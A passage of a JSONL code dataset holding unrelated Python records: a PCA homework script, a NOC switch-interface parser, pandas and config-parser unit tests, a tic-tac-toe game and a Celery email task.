np.linalg.eig(cov_mat)\n\nfor i in range(len(eig_val_sc)):\n eigvec_sc = eig_vec_sc[:,i].reshape(1,3).T\n eigvec_cov = eig_vec_cov[:,i].reshape(1,3).T\n assert eigvec_sc.all() == eigvec_cov.all(), 'Eigenvectors are not identical'\n\n print('Eigenvector {}: \\n{}'.format(i+1, eigvec_sc))\n print('Eigenvalue {} from scatter matrix: {}'.format(i+1, eig_val_sc[i]))\n print('Eigenvalue {} from covariance matrix: {}'.format(i+1, eig_val_cov[i]))\n print('Scaling factor: ', eig_val_sc[i]/eig_val_cov[i])\n print(40 * '-')\n \n \n# checking the eigen Vector-Eigen Value Caculation\n \nfor i in range(len(eig_val_sc)):\n eigv = eig_vec_sc[:,i].reshape(1,3).T\n np.testing.assert_array_almost_equal(scatter_matrix.dot(eigv),\\\n eig_val_sc[i] * eigv, decimal=6,\\\n err_msg='', verbose=True)\n \n \n#Visualizing the eigenvectors\nfig = plt.figure(figsize=(7,7))\nax = fig.add_subplot(111, projection='3d')\n\nax.plot(all_samples[0,:], all_samples[1,:],\\\n all_samples[2,:], 'o', markersize=8, color='green', alpha=0.2)\nax.plot([mean_x], [mean_y], [mean_z], 'o', \\\n markersize=10, color='red', alpha=0.5)\nfor v in eig_vec_sc.T:\n a = Arrow3D([mean_x, v[0]], [mean_y, v[1]],\\\n [mean_z, v[2]], mutation_scale=20, lw=3, arrowstyle=\"-|>\", color=\"r\")\n 
ax.add_artist(a)\nax.set_xlabel('x_values')\nax.set_ylabel('y_values')\nax.set_zlabel('z_values')\n\nplt.title('Eigenvectors')\n\nplt.show() \n\n\n# Verify Eigen vectors are unit vectors\nfor ev in eig_vec_sc:\n np.testing.assert_array_almost_equal(1.0, np.linalg.norm(ev))\n # instead of 'assert' because of rounding errors\n\n\n# sort the eigen vectors\n# Make a list of (eigenvalue, eigenvector) tuples\neig_pairs = [(np.abs(eig_val_sc[i]), eig_vec_sc[:,i]) for i in range(len(eig_val_sc))]\n\n# Sort the (eigenvalue, eigenvector) tuples from high to low\neig_pairs.sort()\neig_pairs.reverse()\n\n# Visually confirm that the list is correctly sorted by decreasing eigenvalues\nfor i in eig_pairs:\n print(i[0])\n \n\n\n# Tramsforming the sample into the subspace\nmatrix_w = np.hstack((eig_pairs[0][1].reshape(3,1), eig_pairs[1][1].reshape(3,1)))\nprint('Matrix W:\\n', matrix_w)\ntransformed = matrix_w.T.dot(all_samples)\nassert transformed.shape == (2,40), \"The matrix is not 2x40 dimensional.\"\n\n\nplt.plot(transformed[0,0:20], transformed[1,0:20],\\\n 'o', markersize=7, color='blue', alpha=0.5, label='class1')\nplt.plot(transformed[0,20:40], transformed[1,20:40],\n '^', markersize=7, color='red', alpha=0.5, label='class2')\nplt.xlim([-4,4])\nplt.ylim([-4,4])\nplt.xlabel('x_values')\nplt.ylabel('y_values')\nplt.legend()\nplt.title('Transformed samples with class labels')\n\nplt.show()\n\n#Using the PCA() class from the matplotlib.mlab library\n\nmlab_pca = mlabPCA(all_samples.T)\n\nprint('PC axes in terms of the measurement axes'\\\n ' scaled by the standard deviations:\\n',\\\n mlab_pca.Wt)\n\nplt.plot(mlab_pca.Y[0:20,0],mlab_pca.Y[0:20,1], 'o', markersize=7,\\\n color='blue', alpha=0.5, label='class1')\nplt.plot(mlab_pca.Y[20:40,0], mlab_pca.Y[20:40,1], '^', markersize=7,\\\n color='red', alpha=0.5, label='class2')\n\nplt.xlabel('x_values')\nplt.ylabel('y_values')\nplt.xlim([-4,4])\nplt.ylim([-4,4])\nplt.legend()\nplt.title('Transformed samples with class labels from matplotlib.mlab.PCA()')\n\nplt.show()\n\n#Using the PCA() class from the sklearn.decomposition library to confirm our results\n\nsklearn_pca = sklearnPCA(n_components=2)\nsklearn_transf = sklearn_pca.fit_transform(all_samples.T)\n\nplt.plot(sklearn_transf[0:20,0],sklearn_transf[0:20,1],\\\n 'o', markersize=7, color='blue', alpha=0.5, label='class1')\nplt.plot(sklearn_transf[20:40,0], sklearn_transf[20:40,1],\\\n '^', markersize=7, color='red', alpha=0.5, label='class2')\n\nplt.xlabel('x_values')\nplt.ylabel('y_values')\nplt.xlim([-4,4])\nplt.ylim([-4,4])\nplt.legend()\nplt.title('Transformed samples with class labels from sklearn.decomposition.PCA()')\n\nplt.show()","sub_path":"Spring2015/HW-Lesson6-PCA.py","file_name":"HW-Lesson6-PCA.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606604713","text":"\n\n#calss header\nclass _HOIST():\n\tdef __init__(self,): \n\t\tself.name = \"HOIST\"\n\t\tself.definitions = [u'to lift something heavy, sometimes using ropes or a machine: ', u'to raise a flag to the top of a pole using a rope']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_hoist.py","file_name":"_hoist.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"559055047","text":"# ---------------------------------------------------------------------\n# Upvel.UP.get_interfaces\n# ---------------------------------------------------------------------\n# Copyright (C) 2007-2019 The NOC Project\n# See LICENSE for details\n# ---------------------------------------------------------------------\n\n# Python modules\nimport re\n\n# NOC modules\nfrom noc.core.script.base import BaseScript\nfrom noc.sa.interfaces.igetinterfaces import IGetInterfaces\nfrom noc.core.text import parse_table\n\n\nclass Script(BaseScript):\n name = \"Upvel.UP.get_interfaces\"\n interface = IGetInterfaces\n\n rx_stp = re.compile(r\"^(?P(?:Gi|2.5G|10G) \\S+)\\s+\", re.MULTILINE)\n rx_ctp = re.compile(\n r\"^(?P(?:Gi|2.5G|10G)\\S+ \\S+)\\s*\\n\" r\"^\\-+\\s*\\n\" r\"^\\s+Loop protect mode is enabled\",\n re.MULTILINE,\n )\n rx_oam = re.compile(\n r\"^(?P(?:Gi|2.5G|10G)\\S+)\\s+(?P\\S+)\\s+enabled\", re.MULTILINE\n )\n rx_switchport = re.compile(\n r\"^Name: (?P(?:Gi|2.5G|10G)\\S+ \\S+)\\s*\\n\"\n r\"^Administrative mode: (?P\\S+)\\s*\\n\"\n r\"^Access Mode VLAN: (?P\\d+)\\s*\\n\"\n r\"^Trunk Native Mode VLAN: (?P\\d+)\\s*\\n\"\n r\"^Administrative Native VLAN tagging: \\S+\\s*\\n\"\n r\"(^VLAN Trunking: \\S+\\s*\\n)?\"\n r\"^Allowed VLANs:(?P.*)\\n\",\n re.MULTILINE,\n )\n rx_vlan = re.compile(r\"^\\s*(?:VLAN )?(?P\\d+)\\s+\", re.MULTILINE)\n rx_hybrid_vlan = re.compile(r\"^Hybrid Native Mode VLAN: (?P\\d+)\", re.MULTILINE)\n rx_link = re.compile(\n r\"^\\s*LINK: (?P\\S+) Mtu:(?P\\d+) \\<(?P.+?)\\>\", re.MULTILINE\n )\n rx_ipv4 = re.compile(r\"^\\s+IPv4:\\s+(?P\\S+)\", re.MULTILINE)\n rx_ipv6 = re.compile(r\"^\\s+IPv6:\\s+(?P\\S+)\", re.MULTILINE)\n\n def get_gvrp(self):\n \"\"\"\n Do not works !!! Need mor examples !!!\n\n try:\n v = self.cli(\"show gvrp protocol-state interface *\")\n if \"GVRP Feature is currently Disabled\" not in v:\n return self.rx_enabled.findall(v)\n except self.CLISyntaxError:\n return []\n \"\"\"\n return []\n\n def get_stp(self):\n try:\n r = []\n v = self.cli(\"show spanning-tree\", cached=True)\n for match in self.rx_stp.finditer(v):\n r += [self.profile.convert_interface_name(match.group(\"port\"))]\n return r\n except self.CLISyntaxError:\n return []\n\n def get_ctp(self):\n try:\n v = self.cli(\"show loop-protect\")\n if \"Loop Protection : Enable\" in v:\n return self.rx_ctp.findall(v)\n except self.CLISyntaxError:\n return []\n return []\n\n def get_oam(self):\n try:\n r = []\n v = self.cli(\"show link-oam\", cached=True)\n for match in self.rx_oam.finditer(v):\n r += [match.group(\"port\") + \" \" + match.group(\"port_num\")]\n return r\n except self.CLISyntaxError:\n return []\n return []\n\n def execute_cli(self):\n interfaces = []\n gvrp = self.get_gvrp()\n stp = self.get_stp()\n ctp = self.get_ctp()\n oam = self.get_oam()\n snmp_indexes = []\n v = self.cli(\"show snmp mib ifmib ifIndex\")\n for row in parse_table(v, max_width=80):\n snmp_indexes += [\n {\n \"ifindex\": int(row[0].strip()),\n \"ifdescr\": row[1].strip(),\n \"ifname\": row[2].strip(),\n }\n ]\n v = self.cli(\"show interface * status\", cached=True)\n for i in parse_table(v):\n ifname = i[0]\n admin_status = i[1] == \"enabled\"\n oper_status = i[6] != \"Down\"\n iface = {\n \"name\": ifname,\n \"type\": \"physical\",\n \"admin_status\": admin_status,\n \"oper_status\": oper_status,\n \"enabled_protocols\": [],\n \"subinterfaces\": [],\n }\n if ifname in gvrp:\n iface[\"enabled_protocols\"] += [\"GVRP\"]\n if ifname in stp:\n iface[\"enabled_protocols\"] += 
[\"STP\"]\n if ifname in ctp:\n iface[\"enabled_protocols\"] += [\"CTP\"]\n if ifname in oam:\n iface[\"enabled_protocols\"] += [\"OAM\"]\n # Always enabled\n iface[\"enabled_protocols\"] += [\"LLDP\"]\n for i in snmp_indexes:\n if ifname == i[\"ifname\"]:\n iface[\"snmp_ifindex\"] = i[\"ifindex\"]\n iface[\"description\"] = i[\"ifdescr\"]\n break\n sub = {\n \"name\": ifname,\n \"admin_status\": admin_status,\n \"oper_status\": oper_status,\n \"enabled_afi\": [\"BRIDGE\"],\n \"tagged_vlans\": [],\n }\n s = self.cli(\"show interface %s switchport\" % ifname)\n match1 = self.rx_switchport.search(s)\n if match1.group(\"mode\") == \"access\":\n sub[\"untagged_vlan\"] = int(match1.group(\"access_vlan\"))\n elif match1.group(\"mode\") == \"trunk\":\n sub[\"untagged_vlan\"] = int(match1.group(\"native_vlan\"))\n sub[\"tagged_vlans\"] = self.expand_rangelist(match1.group(\"vlans\").strip())\n elif match1.group(\"mode\") == \"hybrid\":\n sub[\"untagged_vlan\"] = int(match1.group(\"native_vlan\"))\n sub[\"tagged_vlans\"] = self.expand_rangelist(match1.group(\"vlans\").strip())\n match2 = self.rx_hybrid_vlan.search(s)\n if match2:\n sub[\"untagged_vlan\"] = int(match2.group(\"native_vlan\"))\n else:\n raise self.NotSupportedError()\n iface[\"subinterfaces\"] += [sub]\n interfaces += [iface]\n v = self.cli(\"show ip interface brief\")\n for match in self.rx_vlan.finditer(v):\n vlan_id = match.group(\"vlan\")\n ll = self.cli(\"show interface vlan %s\" % vlan_id)\n ifname = \"VLAN%s\" % vlan_id\n match1 = self.rx_link.search(ll)\n iface = {\n \"name\": ifname,\n \"type\": \"SVI\",\n \"admin_status\": True,\n \"oper_status\": \"UP \" in match1.group(\"options\"),\n \"mac\": match1.group(\"mac\"),\n \"subinterfaces\": [\n {\n \"name\": ifname,\n \"admin_status\": True,\n \"oper_status\": \"UP \" in match1.group(\"options\"),\n \"mtu\": match1.group(\"mtu\"),\n \"mac\": match1.group(\"mac\"),\n \"enabled_afi\": [],\n \"vlan_ids\": [int(vlan_id)],\n }\n ],\n }\n match1 = self.rx_ipv4.search(ll)\n if match1:\n iface[\"subinterfaces\"][0][\"enabled_afi\"] += [\"IPv4\"]\n iface[\"subinterfaces\"][0][\"ipv4_addresses\"] = [match1.group(\"ip\")]\n match1 = self.rx_ipv6.search(ll)\n if match1:\n iface[\"subinterfaces\"][0][\"enabled_afi\"] += [\"IPv6\"]\n iface[\"subinterfaces\"][0][\"ipv6_addresses\"] = [match1.group(\"ip\")]\n for i in snmp_indexes:\n if ifname.lower() == i[\"ifname\"].replace(\" \", \"\"):\n iface[\"snmp_ifindex\"] = i[\"ifindex\"]\n iface[\"description\"] = i[\"ifdescr\"]\n break\n interfaces += [iface]\n return [{\"interfaces\": interfaces}]\n","sub_path":"sa/profiles/Upvel/UP/get_interfaces.py","file_name":"get_interfaces.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"394502854","text":"import pytest\n\nfrom pandas._libs.tslibs import frequencies as libfrequencies, resolution\nfrom pandas._libs.tslibs.frequencies import (\n FreqGroup, _period_code_map, get_freq, get_freq_code)\n\nimport pandas.tseries.offsets as offsets\n\n\n@pytest.fixture(params=list(_period_code_map.items()))\ndef period_code_item(request):\n return request.param\n\n\n@pytest.mark.parametrize(\"freqstr,expected\", [\n (\"A\", 1000), (\"3A\", 1000), (\"-1A\", 1000),\n (\"Y\", 1000), (\"3Y\", 1000), (\"-1Y\", 1000),\n (\"W\", 4000), (\"W-MON\", 4001), (\"W-FRI\", 4005)\n])\ndef test_freq_code(freqstr, expected):\n assert get_freq(freqstr) == expected\n\n\ndef test_freq_code_match(period_code_item):\n freqstr, code = 
period_code_item\n assert get_freq(freqstr) == code\n\n\n@pytest.mark.parametrize(\"freqstr,expected\", [\n (\"A\", 1000), (\"3A\", 1000), (\"-1A\", 1000), (\"A-JAN\", 1000),\n (\"A-MAY\", 1000), (\"Y\", 1000), (\"3Y\", 1000), (\"-1Y\", 1000),\n (\"Y-JAN\", 1000), (\"Y-MAY\", 1000), (offsets.YearEnd(), 1000),\n (offsets.YearEnd(month=1), 1000), (offsets.YearEnd(month=5), 1000),\n (\"W\", 4000), (\"W-MON\", 4000), (\"W-FRI\", 4000), (offsets.Week(), 4000),\n (offsets.Week(weekday=1), 4000), (offsets.Week(weekday=5), 4000),\n (\"T\", FreqGroup.FR_MIN),\n])\ndef test_freq_group(freqstr, expected):\n assert resolution.get_freq_group(freqstr) == expected\n\n\ndef test_freq_group_match(period_code_item):\n freqstr, code = period_code_item\n\n str_group = resolution.get_freq_group(freqstr)\n code_group = resolution.get_freq_group(code)\n\n assert str_group == code_group == code // 1000 * 1000\n\n\n@pytest.mark.parametrize(\"freqstr,exp_freqstr\", [\n (\"D\", \"D\"), (\"W\", \"D\"), (\"M\", \"D\"),\n (\"S\", \"S\"), (\"T\", \"S\"), (\"H\", \"S\")\n])\ndef test_get_to_timestamp_base(freqstr, exp_freqstr):\n tsb = libfrequencies.get_to_timestamp_base\n\n assert tsb(get_freq_code(freqstr)[0]) == get_freq_code(exp_freqstr)[0]\n\n\n_reso = resolution.Resolution\n\n\n@pytest.mark.parametrize(\"freqstr,expected\", [\n (\"A\", \"year\"), (\"Q\", \"quarter\"), (\"M\", \"month\"),\n (\"D\", \"day\"), (\"H\", \"hour\"), (\"T\", \"minute\"),\n (\"S\", \"second\"), (\"L\", \"millisecond\"),\n (\"U\", \"microsecond\"), (\"N\", \"nanosecond\")\n])\ndef test_get_str_from_freq(freqstr, expected):\n assert _reso.get_str_from_freq(freqstr) == expected\n\n\n@pytest.mark.parametrize(\"freq\", [\"A\", \"Q\", \"M\", \"D\", \"H\",\n \"T\", \"S\", \"L\", \"U\", \"N\"])\ndef test_get_freq_roundtrip(freq):\n result = _reso.get_freq(_reso.get_str_from_freq(freq))\n assert freq == result\n\n\n@pytest.mark.parametrize(\"freq\", [\"D\", \"H\", \"T\", \"S\", \"L\", \"U\"])\ndef test_get_freq_roundtrip2(freq):\n result = _reso.get_freq(_reso.get_str(_reso.get_reso_from_freq(freq)))\n assert freq == result\n\n\n@pytest.mark.parametrize(\"args,expected\", [\n ((1.5, \"T\"), (90, \"S\")), ((62.4, \"T\"), (3744, \"S\")),\n ((1.04, \"H\"), (3744, \"S\")), ((1, \"D\"), (1, \"D\")),\n ((0.342931, \"H\"), (1234551600, \"U\")), ((1.2345, \"D\"), (106660800, \"L\"))\n])\ndef test_resolution_bumping(args, expected):\n # see gh-14378\n assert _reso.get_stride_from_decimal(*args) == expected\n\n\n@pytest.mark.parametrize(\"args\", [\n (0.5, \"N\"),\n\n # Too much precision in the input can prevent.\n (0.3429324798798269273987982, \"H\")\n])\ndef test_cat(args):\n msg = \"Could not convert to integer offset at any resolution\"\n\n with pytest.raises(ValueError, match=msg):\n _reso.get_stride_from_decimal(*args)\n\n\n@pytest.mark.parametrize(\"freq_input,expected\", [\n # Frequency string.\n (\"A\", (get_freq(\"A\"), 1)),\n (\"3D\", (get_freq(\"D\"), 3)),\n (\"-2M\", (get_freq(\"M\"), -2)),\n\n # Tuple.\n ((\"D\", 1), (get_freq(\"D\"), 1)),\n ((\"A\", 3), (get_freq(\"A\"), 3)),\n ((\"M\", -2), (get_freq(\"M\"), -2)),\n ((5, \"T\"), (FreqGroup.FR_MIN, 5)),\n\n # Numeric Tuple.\n ((1000, 1), (1000, 1)),\n\n # Offsets.\n (offsets.Day(), (get_freq(\"D\"), 1)),\n (offsets.Day(3), (get_freq(\"D\"), 3)),\n (offsets.Day(-2), (get_freq(\"D\"), -2)),\n (offsets.MonthEnd(), (get_freq(\"M\"), 1)),\n (offsets.MonthEnd(3), (get_freq(\"M\"), 3)),\n (offsets.MonthEnd(-2), (get_freq(\"M\"), -2)),\n (offsets.Week(), (get_freq(\"W\"), 1)),\n (offsets.Week(3), 
(get_freq(\"W\"), 3)),\n (offsets.Week(-2), (get_freq(\"W\"), -2)),\n (offsets.Hour(), (FreqGroup.FR_HR, 1)),\n\n # Monday is weekday=0.\n (offsets.Week(weekday=1), (get_freq(\"W-TUE\"), 1)),\n (offsets.Week(3, weekday=0), (get_freq(\"W-MON\"), 3)),\n (offsets.Week(-2, weekday=4), (get_freq(\"W-FRI\"), -2)),\n])\ndef test_get_freq_code(freq_input, expected):\n assert get_freq_code(freq_input) == expected\n\n\ndef test_get_code_invalid():\n with pytest.raises(ValueError, match=\"Invalid frequency\"):\n get_freq_code((5, \"baz\"))\n","sub_path":"pandas/tests/tseries/frequencies/test_freq_code.py","file_name":"test_freq_code.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595922494","text":"\"\"\"\nTests for nearby.config module\n\"\"\"\n\nimport configparser\nimport os\nimport unittest\n\nfrom nearby import config\n\n\nTEST_CONF = os.path.join(os.path.dirname(__file__), 'data', 'test.conf')\n\n\nclass HostBasedConfigParserTestCase(unittest.TestCase):\n\n def setUp(self):\n self.simple = config.HostBasedConfigParser({\n 'host': str,\n 'remote_path': config._path_type,\n 'local_path': config._path_type,\n 'user': config._path_type,\n })\n self.simple.read(config._BASE_CONFIG)\n self.simple.add_section('__user_args__')\n\n self.complex = config.HostBasedConfigParser({\n 'host': str,\n 'remote_path': config._path_type,\n 'local_path': config._path_type,\n 'user': config._path_type,\n })\n self.complex.read([config._BASE_CONFIG, TEST_CONF])\n self.complex.add_section('__user_args__')\n\n def test_that_test_conf_exists(self):\n self.assertTrue(os.path.exists(TEST_CONF))\n\n def test_is_valid_ipv4_wildcard(self):\n good_ipv4_wildcards = [\n '127.0.0.1',\n '127.0.0.*',\n '127.0.*.0',\n '127.0.*.*',\n '127.*.*.*',\n '*.*.*.*',\n ]\n bad_ipv4_wildcards = [\n '*',\n 'anything',\n '',\n '*.*.*', # bad octet value\n '127.0.*', # not enough octets\n '256.*.*.*', # bad octet value\n ]\n for wildcard in good_ipv4_wildcards:\n self.assertTrue(\n self.simple._is_valid_ipv4_wildcard(wildcard))\n for wildcard in bad_ipv4_wildcards:\n self.assertFalse(\n self.simple._is_valid_ipv4_wildcard(wildcard))\n\n def test_transform_with_specificity(self):\n test_strs_to_expected = {\n '127.0.0.1': (r'^127\\.0\\.0\\.1$', 4),\n '127.0.0.*': (r'^127\\.0\\.0\\.\\d{1,3}$', 3),\n '127.0.*.*': (r'^127\\.0\\.\\d{1,3}\\.\\d{1,3}$', 2),\n '127.*.*.*': (r'^127\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', 1),\n '*.*.*.*': (r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', 0),\n '*': (r'^.*$', 0),\n 'bitbucket.org': (r'^bitbucket\\.org$', 0),\n '*.bitbucket.org': (r'^.*\\.bitbucket\\.org$', 0),\n '*.*.bitbucket.org': (r'^.*\\..*\\.bitbucket\\.org$', 0),\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._transform_with_specificity(test_str)\n self.assertEqual(actual, expected)\n\n def test_get_ipv4_specificity(self):\n test_strs_to_expected = {\n '127.0.0.1': 4,\n '127.0.0.*': 3,\n '127.0.*.1': 3,\n '127.0.*.*': 2,\n '127.*.*.*': 1,\n '*.*.*.*': 0,\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._get_ipv4_specificity(test_str)\n self.assertEqual(actual, expected)\n\n def test_get_hostname_specificity(self):\n test_strs_to_expected = {\n 'anything': 0,\n '*': 0,\n '*anything*': 0,\n '*.bitbucket.org': 0,\n 'bitbucket.org': 0,\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._get_hostname_specificity(test_str)\n self.assertEqual(actual, 
expected)\n\n def test_transform_ipv4_pattern(self):\n test_strs_to_expected = {\n '127.0.0.1': r'^127\\.0\\.0\\.1$',\n '127.0.0.*': r'^127\\.0\\.0\\.\\d{1,3}$',\n '127.0.*.*': r'^127\\.0\\.\\d{1,3}\\.\\d{1,3}$',\n '127.*.*.*': r'^127\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$',\n '*.*.0.*': r'^\\d{1,3}\\.\\d{1,3}\\.0\\.\\d{1,3}$',\n '*.*.*.*': r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$',\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._transform_ipv4_pattern(test_str)\n self.assertEqual(actual, expected)\n\n def test_transform_hostname_pattern(self):\n test_strs_to_expected = {\n 'nativedev': '^nativedev$',\n '*nativedev*': '^.*nativedev.*$',\n '*': '^.*$',\n '*.bitbucket.org': '^.*\\.bitbucket\\.org$',\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._transform_hostname_pattern(test_str)\n self.assertEqual(actual, expected)\n\n def test_simple_get_specificity_list(self):\n test_strs_to_expected = {\n 'nativedev': ['__user_args__'],\n '10.0.3.123': ['__user_args__']\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._get_specificity_list(test_str)\n self.assertEqual(actual, expected)\n\n def test_complex_get_specificity_list(self):\n test_strs_to_expected = {\n 'nativedev': [\n # TODO: add specificity logic for hostnames\n '__user_args__',\n 'host *',\n 'host nativedev 10.0.3.123',\n ],\n '10.0.3.123': [\n '__user_args__',\n 'host nativedev 10.0.3.123',\n 'host 10.0.3.*',\n 'host 10.0.*.*',\n 'host 10.*.*.*',\n # TODO: make all ipv4 wildcards more specific\n # than non-ipv4 wildcards\n 'host *',\n 'host *.*.*.*',\n ],\n '10.0.3.255': [\n '__user_args__',\n 'host 10.0.3.*',\n 'host 10.0.*.*',\n 'host 10.*.*.*',\n 'host *',\n 'host *.*.*.*',\n ],\n '10.0.255.255': [\n '__user_args__',\n 'host 10.0.*.*',\n 'host 10.*.*.*',\n 'host *',\n 'host *.*.*.*',\n ],\n '10.255.255.255': [\n '__user_args__',\n 'host 10.*.*.*',\n 'host *',\n 'host *.*.*.*',\n ],\n '255.255.255.255': [\n '__user_args__',\n 'host *',\n 'host *.*.*.*',\n ],\n 'github.bitbucket.org': [\n '__user_args__',\n 'host *',\n ],\n 'bitbucket.org': [\n '__user_args__',\n 'host bitbucket.org',\n 'host *',\n ]\n }\n for test_str, expected in test_strs_to_expected.items():\n # TODO: returning specificity list in increasing order\n # is leading to kludgy code in a couple of places. 
fix it\n actual = list(\n reversed(self.complex._get_specificity_list(test_str)))\n self.assertEqual(actual, expected)\n\n def test_has_own_option(self):\n with self.assertRaises(configparser.NoSectionError):\n self.simple.has_own_option('fictional', 'irrelevant')\n with self.assertRaises(configparser.NoSectionError):\n self.complex.has_own_option('fictional', 'irrelevant')\n self.assertTrue(self.complex.has_own_option('host 10.0.3.*', 'user'))\n self.assertFalse(self.complex.has_own_option('host 10.*.*.*', 'user'))\n\n def test_simple_get_option(self):\n self.assertEqual(\n self.simple.get_option('10.0.3.123', 'remote_path'), '/')\n # failure modes\n with self.assertRaises(configparser.NoOptionError):\n self.simple.get_option('10.0.3.123', 'fictional')\n with self.assertRaises(configparser.NoOptionError):\n self.simple.get_option('10.0.3.123', 'random_setting')\n\n def test_complex_get_option(self):\n # if these don't error out then cascading works properly\n self.complex.get_option('10.0.3.123', 'random_setting')\n self.complex.get_option('10.0.3.123', 'another_setting')\n self.complex.get_option('10.0.3.123', 'yet_another_setting')\n self.complex.get_option('10.0.3.123', 'still_yet_another_setting')\n\n self.assertEqual(\n self.complex.get_option('10.0.3.123', 'random_setting'),\n 'specificitydependsonhostarg')\n with self.assertRaises(configparser.NoOptionError):\n self.complex.get_option('10.0.3.123', 'fictional')\n with self.assertRaises(configparser.NoOptionError):\n self.complex.get_option('10.0.3.124', 'random_setting')\n\n\nclass InitConfigTestCase(unittest.TestCase):\n \"\"\"\n These are stupid tests.\n \"\"\"\n\n def tearDown(self):\n config.delete_config()\n\n def test_no_user_args(self):\n config.init_config()\n\n def test_empty_user_args(self):\n config.init_config({})\n\n def test_with_user_args(self):\n config.init_config({'something': 'with a value'})\n\n def test_with_bad_user_args(self):\n with self.assertRaises(TypeError):\n config.init_config(object())\n\n\nclass GetOptionTestCase(unittest.TestCase):\n\n def tearDown(self):\n config.delete_config()\n\n def test_get_nonexistant_option(self):\n config.init_config()\n with self.assertRaises(configparser.NoOptionError):\n config.get_option('10.0.3.123', 'fictional')\n\n def test_get_existing_option(self):\n config.init_config()\n expected = os.path.expandvars('$USER')\n actual = config.get_option('10.0.3.123', 'user')\n self.assertEqual(actual, expected)\n\n def test_get_user_arg_option(self):\n config.init_config({'not fictional': 'but real'})\n expected = 'but real'\n actual = config.get_option('10.0.3.123', 'not fictional')\n self.assertEqual(actual, expected)\n\n def test_get_option_without_init_config(self):\n with self.assertRaises(Exception):\n config.get_option('10.0.3.123', 'user')\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544870091","text":"import random\n\ndef ask_symbol():\n symbol = input('> Quel symbole voulez-vous ? X ou O ')\n return symbol\n\n\ndef play_again():\n another = input('> Voules-vous rejouer ? 
yes / no ')\n    return another.lower().startswith('y')\n\n\ndef show_board(board):\n    print(board[6] + \"|\" + board[7] + \"|\" + board[8])\n    print(\"-\" * 5)\n    print(board[3] + \"|\" + board[4] + \"|\" + board[5])\n    print(\"-\" * 5)\n    print(board[0] + \"|\" + board[1] + \"|\" + board[2])\n\n\ndef plays_first():\n    coin_toss = random.randint(0, 1)\n    return coin_toss\n\n\ndef make_move(board, symbol, position):\n    board[position] = symbol\n    return board\n\ndef get_human_move():\n    move = input('Quel coup voulez vous jouer ? ')\n    return int(move)\n\ndef is_won(board):\n    bool_result1 = (board[0] == board[1] == board[2] != ' ')\n    bool_result2 = (board[3] == board[4] == board[5] != ' ')\n    bool_result3 = (board[6] == board[7] == board[8] != ' ')\n    bool_result4 = (board[0] == board[3] == board[6] != ' ')\n    bool_result5 = (board[1] == board[4] == board[7] != ' ')\n    bool_result6 = (board[2] == board[5] == board[8] != ' ')\n    bool_result7 = (board[0] == board[4] == board[8] != ' ')\n    bool_result8 = (board[6] == board[4] == board[2] != ' ')\n    bool_result = bool_result1 | bool_result2 | bool_result3\n    bool_result = bool_result | bool_result4 | bool_result5\n    bool_result = bool_result | bool_result6 | bool_result7\n    bool_result = bool_result | bool_result8\n    return bool_result\n\ndef is_tie(board):\n    bool_tie = ' ' not in board\n    return bool_tie\n\ndef get_comp_move(board):\n    position = board.index(' ')\n    return position\n\n\ndef human_plays(board, h_symbol, c_symbol):\n    show_board(board)\n    position = get_human_move()\n    board = make_move(board, h_symbol, position)\n    if is_won(board):\n        print(\"Vous avez gagné !!\")\n    elif is_tie(board):\n        print(\"C'est une égalité :c\")\n    else:\n        comp_plays(board, h_symbol, c_symbol)\n\ndef comp_plays(board, h_symbol, c_symbol):\n    position = get_comp_move(board)\n    board = make_move(board, c_symbol, position)\n    if is_won(board):\n        print(\"L'ordinateur a gagné !!\")\n    elif is_tie(board):\n        print(\"C'est une égalité :c\")\n    else:\n        human_plays(board, h_symbol, c_symbol)\n\n\ndef play_game():\n    human_symbol = ask_symbol()\n    if human_symbol == 'X':\n        comp_symbol = 'O'\n    else:\n        comp_symbol = 'X'\n    who_plays_first = ['X', 'O'][plays_first()]\n    board = [' '] * 9\n    if who_plays_first == human_symbol:\n        human_plays(board, human_symbol, comp_symbol)\n    else:\n        comp_plays(board, human_symbol, comp_symbol)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n    play_game()\n","sub_path":"session-01.py","file_name":"session-01.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"295116439","text":"# Producer -- the task function\n# 1. This function must be decorated with the Celery instance's task decorator\n# 2. Celery must auto-discover tasks in the specified packages\nfrom django.core.mail import send_mail\nfrom celery_tasks.main import app\n\n\n@app.task\ndef celery_send_email(subject, message, from_email, recipient_list, html_message):\n    send_mail(subject=subject,\n              message=message,\n              from_email=from_email,\n              recipient_list=recipient_list,\n              html_message=html_message)\n","sub_path":"meiduo_mall/celery_tasks/email/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
